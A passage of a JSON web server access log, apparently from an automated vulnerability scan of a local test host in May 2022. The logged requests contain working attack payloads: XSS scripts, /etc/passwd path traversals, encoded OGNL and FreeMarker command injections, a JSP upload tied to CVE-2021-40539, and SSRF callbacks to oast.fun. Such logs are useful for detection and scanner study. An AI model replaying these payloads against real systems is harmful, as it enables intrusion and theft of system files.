\x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/297MU10wostQP3mMbyqaHokilkE/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://c9v8h88smpv8c1ig07h0true8e5ixxb77.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x22297MU2ImmrYRpdIyQFh2mrvPdmM\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9v8h8gsmpv8c1qg07h0qk5fph5ok5sy9.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.161","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:04 